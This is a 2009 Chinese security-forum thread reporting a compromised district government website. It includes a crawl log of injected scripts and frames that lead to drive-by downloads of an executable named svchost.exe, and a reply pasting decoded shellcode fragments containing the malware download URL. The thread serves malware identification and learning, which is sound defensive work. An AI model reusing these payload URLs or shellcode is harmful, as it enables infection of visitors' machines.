瑞星卡卡安全论坛技术交流区恶意网站交流 http://www.shrd.gov.cn/(沈河区人大网站)

1   1  /  1  页   跳转

[黑名单] http://www.shrd.gov.cn/(沈河区人大网站)

http://www.shrd.gov.cn/(沈河区人大网站)

Log is generated by FreShow.
[wide]http://www.shrd.gov.cn/news/showfiles.asp?id=4
    [script]http://qvoev323.cn/c.js
        [frame]http://x.52av.biz/1/google.htm
        [frame]http://59.34.197.156/aa/a3a.htm
            [frame]http://59.34.197.156/aa/360.htm
                [frame]http://59.34.197.156/aa/he.htm
                    [script]http://59.34.197.156/aa/h.js
                        [object]http://kapa8080.com/svchost.exe
                [frame]http://59.34.197.156/aa/test.htm
                    [script]http://59.34.197.156/aa/ly.jpg
                        [object]http://kapa8080.com/svchost.exe
                    [script]http://59.34.197.156/aa/ly3.jpg
                    [script]http://59.34.197.156/aa/ly1.jpg
                [frame]http://59.34.197.156/aa/02.htm
                    [script]http://59.34.197.156/aa/02.js
                        [object]http://kapa8080.com/svchost.exe
                [frame]http://59.34.197.156/aa/pp.htm
                    [frame]http://59.34.197.156/aa/p.htm
                        [frame]http://59.34.197.156/aa/pef.pdf
                            [object]http://kapa8080.com/svchost.exe
                    [frame]http://59.34.197.156/aa/f.htm
                    [frame]http://59.34.197.156/aa/of.htm
                        [script]http://59.34.197.156/aa/a.js
                            [object]http://kapa8080.com/svchost.exe
                    [frame]http://59.34.197.156/aa/r.htm
                        [script]http://59.34.197.156/aa/r.js
                            [object]http://kapa8080.com/svchost.exe
                    [frame]http://59.34.197.156/aa/r.html
                        [script]http://59.34.197.156/aa/url.js
                        [script]http://59.34.197.156/aa/rl.js
                            [object]http://kapa8080.com/svchost.exe
            [script]http://59.34.197.156/aa/\"http:\/\/js.tongji.linezing.com\/1137761\/tongji.js\"
            [script]http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284
        [frame]http://59.34.197.156/aa/a3a.htm
        [frame]http://59.34.197.156/aa/a3a.htm
        [frame]http://59.34.197.156/aa/a3a.htm
    [script]http://qvoev323.cn/c.js

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
分享到:
gototop
 

回复: http://www.shrd.gov.cn/(沈河区人大网站)

刚学解马,hxxp://59.34.197.156/aa/ly.jpg 里应该是带密匙(BD?)的shellcode吧?
输入密匙BD,解出来的东西:

varly1='邋邋V鰩t??壎_GV窾VBBB?';
varly2='_d?婡 媝瓔h嬿jY杈愨鴋3';
varly3='2hUserT婩 杈嬭jY铻怡hon';
varly4='hurlmT吚uhonhurlmT婩 鑾';
varly5='嬭jY鑞怡hl32hshelT婩 鑟';
varly6='嬭jY鐿怡侅嬡伱€jjSj';
varly7='V\3繞€<u\a.e荄xe3蒕Q';
varly8='SWQ3缷FX?凐椋恓jjjj';
varly9='h繱婩$?塅`jPV(塅d婩`jj';
varly10='jjjPV,jjjhPV<塅x婲d';
varly11='€|磘 €|t€t粹雺唨荈p';
varly12='荈tjjj婩`PV8媶€j峃';
varly13='tQvpPv`V0v`V4vxV@孄3?蹃?;
varly14='嬏凐T}?兝塍嬏嬞兠3繮QSP';
varly15='PPPPPWPPV媬T?鑕hcvwhsh';
varly16='doT婩 ?塅varly17='F?3跾SSS衻8鑰8閡亁悙悙t';
varly18='?U嬱岪噼γ锠?€?钃';
varly19='侅孅兦?2t?荊c壯O荊爀?;
varly20='饲G Q@?荊>?荊竔?荊?f犌G';
varly21='7G ?
鴇?婡 媝瓔h嬿jY';
varly22='鑄愨鴋32hUserT?鑅嬭jY?;
varly23='5怡3WV?X描?[?笁_f荊';
varly24='嗝S嬡Sj@hW婩 ?X肣V媢<媡';
varly25='.x鮒媣 ?蒊A????:謙了贎';
varly26='腭;u鏭媈$輋?K媈輯?奴^Y描?;
varly27='?豺怍9鈣冓H{=2t?呥c壯OQ@??;
varly28='e椝飺2鋽?
K膷tWf
C粳踼';
varly29='馥歊??竔??f狘?瓨
鴢织汒S';
varlyaa='f[url]http://127.0.0.1/1.exeeeeeeeeeeeeeWW'[/url][/url];
varly30='f[url]http://kapa8080.com/svchost.exe'[/url][/url];


不知道对不对啊  上面还有个127.0.0.1那个......
最后编辑networkedition 最后编辑于 2009-08-05 09:07:03
gototop
 

回复:http://www.shrd.gov.cn/(沈河区人大网站)

varly30='f[url]http://kapa8080.com/svchost.exe'[/url][/url];
不知道这个是什么 网马地址不是出来了嘛
gototop
 

回复 3F networkedition 的帖子

师父
那个[url]是回复时引用代码自动出现的 。。。。
  解出来的是‘fhttp://kapa8080.com/svchost.exe'
http://127.0.0.1/1.exeeeeeeeeeeeeeWW这个要管么,也下载不下来....
最后编辑backway 最后编辑于 2009-08-05 09:19:27
gototop
 

回复 4F backway 的帖子

晕,http://127.0.0.1你能下载下来才怪,那个没有用
gototop
 

回复 5F networkedition 的帖子

那个我也觉得奇怪 只是纳闷为什么会出现 那个可以不管了
-------
恩恩 知道了 谢谢师父
最后编辑backway 最后编辑于 2009-08-05 09:41:15
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT